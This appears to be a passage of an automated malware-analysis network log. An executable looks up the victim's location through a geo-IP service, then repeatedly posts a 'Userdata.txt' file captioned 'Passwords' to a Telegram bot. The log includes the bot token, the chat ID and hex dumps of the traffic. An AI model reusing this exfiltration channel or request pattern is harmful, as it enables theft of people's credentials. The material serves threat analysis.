                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: 37 71 04 76 a0 5b d4 e9 41 17 ac d5 90 34 06 34 5d f8 44 e7 16 52 0c 08 2e 38 d6 e0 80 da bd b7 34 2e 60 3d a5 9f ca 4b 3e 23 72 e9 d4 1e 50 1d 85 45 16 d2 bb 36 3b d3 00 3b c7 a7 42 4d 4a 22 91 5c 6d 0e 0f 01 43 38 32 10 40 1f 98 e6 a4 66 c5 44 95 22 b0 69 92 9e 07 40 26 cd db 4f 73 a8 1b 3b 2a 80 73 d3 4d 29 24 c3 d0 a7 32 8a e1 ea b1 3e 09 bd 03 70 b1 e6 39 d4 10 c1 fe 80 75 c0 d7 2f 78 bd 16 14 ed 20 21 f3 39 35 8e 0b ec 36 3d 0b dc b2 53 a5 23 2a ce 75 81 e7 12 ce fe de a2 20 c3 a5 3f 82 9d 11 b4 0f 18 be 1f 80 28 ee 45 cd 8f 88 5f 40 bd bf 70 94 2a d5 5d cd 78 db ba da ad f0 98 69 bc 7b 44 4f e1 6f 2e e8 20 f8 97 9f 79 71 70 a7 52 73 ee ed a3 4a a7 3b 3c a2 62 04 77 bb 13 4a 0a c7 a5 9e fa 0c 43 88 3c da cd e2 43 d8 0b 9e 36 81 a0 96 fd 3e 4f c4 7b
                                                                                                          Data Ascii: 7qv[A44]DR.84.`=K>#rPE6;;BMJ"\mC82@fD"i@&Os;*sM)$2>p9u/x !956=S#*u ?(E_@p*]xi{DOo. yqpRsJ;<bwJC<C6>O{
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: 02 e2 e0 c0 ea 47 f0 8c 45 19 b6 a7 32 28 a8 07 18 6a b1 6a ed 5c dc 98 12 7b 6d 41 0d 6f 7f 3e 94 57 8a 98 e7 87 63 b2 a2 81 22 eb eb b7 a1 a4 e2 03 df a1 72 61 da f7 85 0f e9 0d 02 ef 0c 38 de c9 b2 32 f0 6b 73 aa 2f 0a 0c 23 6c d2 29 69 36 65 63 a6 36 5d 41 dd 3c 7f d5 e7 17 fc 21 42 1c 14 7b fe 1d ce 37 32 0b d6 a0 ad a6 6d 3e d5 b2 9e cc 4e d4 62 e7 9c c0 3c 7f d6 f0 7b db a4 5a 92 a8 08 89 80 d8 53 bf 8b cf 5f 30 15 44 69 85 04 36 64 d7 0a 9d af da dd 41 bd 72 ad 29 e7 6a fd 77 01 c8 20 98 35 b7 d9 35 70 ad 40 65 a0 e6 a3 36 a2 2a 31 b9 2c 04 66 b1 8c 59 22 1f a1 9e f0 6f 77 bc ea b9 e2 bd 44 c9 07 aa d6 79 77 91 fd 3e 9b df 59 32 56 7b 93 a6 39 21 0f 8b 91 a4 e2 69 63 39 68 65 09 e2 20 89 7f 72 ff 23 3c 38 ae 57 76 58 a1 dc 92 f7 b8 f6 42 4c b1 43
                                                                                                          Data Ascii: GE2(jj\{mAo>Wc"ra82ks/#l)i6ec6]A<!B{72m>Nb<{ZS_0Di6dAr)jw 55p@e6*1,fY"owDyw>Y2V{9!ic9he r#<8WvXBLC
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: a6 22 9b 43 81 b8 ad 68 74 c7 d3 54 aa da 87 0d 6b ec 1c 06 4d 29 22 ac 9c a7 32 80 9e 57 b1 3e 65 af 06 70 b0 e2 4b 36 51 c1 8e 97 46 71 d3 2f 0e aa e8 17 cf 25 53 00 3c 2a e2 35 1c b7 3d 01 a4 3d 88 a6 0c 11 8c 64 8d c1 55 d3 75 c9 5a 20 c2 8a 22 f7 42 43 b5 7f ba 9d 7b 5e 8a cb 5b b3 ab ef 05 2c 1f ea 06 57 2e 77 7e f1 02 f2 7c da dd 54 aa a8 be 78 f0 79 fa 25 17 c9 20 88 3d a6 de 03 18 b1 41 0e ff 37 a3 4a a5 27 39 9b 2b 76 09 ad 93 35 65 12 a1 9e fc 0e 40 97 fb ce b8 6f 58 c9 7d cf 03 7f 5f 6f ee 3b 80 d1 76 98 10 7a 95 b5 37 43 d0 a7 d2 a4 c6 62 10 63 7e 0a 7d 8c f2 83 10 71 d8 2b 59 c3 3a 57 70 49 68 c6 85 e8 bf 0f 7b 48 ba 52 85 03 e7 94 06 21 3f 28 1f fe 7e ef 37 f4 2f 9f d0 34 8d 03 2d d7 08 1a c0 05 0c 4d 93 51 b0 dc e6 88 a9 59 85 00 a4 0f be
                                                                                                          Data Ascii: "ChtTkM)"2W>epK6QFq/%S<*5==dUuZ "BC{^[,W.w~|Txy% =A7J'9+v5e@oX}_o;vz7Cbc~}q+Y:WpIh{HR!?(~7/4-MQY


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.949976104.21.96.14431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:11:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:11:53 UTC857INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:11:53 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1861902
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTim8cgfDpt%2FuKJuoSOvPX9MULVbcez9KBFB3JBmVNvnWVyUyHPLdZ%2BQd104wcy0kYQjQ5fOxdO%2BUk7Vzjm0Jf2yN9nwNdsk6izokT8zQ66c9NFYGOmPV6zdP9EGE8%2BmRiqriqPh"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 900001645e3b4363-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1583&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1779402&cwnd=240&unsent_bytes=0&cid=996d0e15d4cc6d30&ts=168&x=0"
                                                                                                          2025-01-10 22:11:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.949977149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:00 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3199e441f6db
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 39 65 34 34 31 66 36 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3199e441f6dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:00 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:00 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:00 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44785,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547120,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.949979149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:01 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31b0368823d7
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 30 33 36 38 38 32 33 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31b0368823d7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:02 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:01 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:02 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44786,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547121,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.949981149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:03 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31c24cf1dd08
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 32 34 63 66 31 64 64 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31c24cf1dd08Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:03 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:03 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:03 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44787,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547123,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.949983149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:04 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31d456c3dc56
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 34 35 36 63 33 64 63 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31d456c3dc56Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:05 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:05 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:05 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44788,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547125,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.949985149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:06 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31e7b6fffa58
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 37 62 36 66 66 66 61 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31e7b6fffa58Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:06 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:06 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:06 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44789,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547126,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.949987149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:08 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31f9a7e3cc8b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
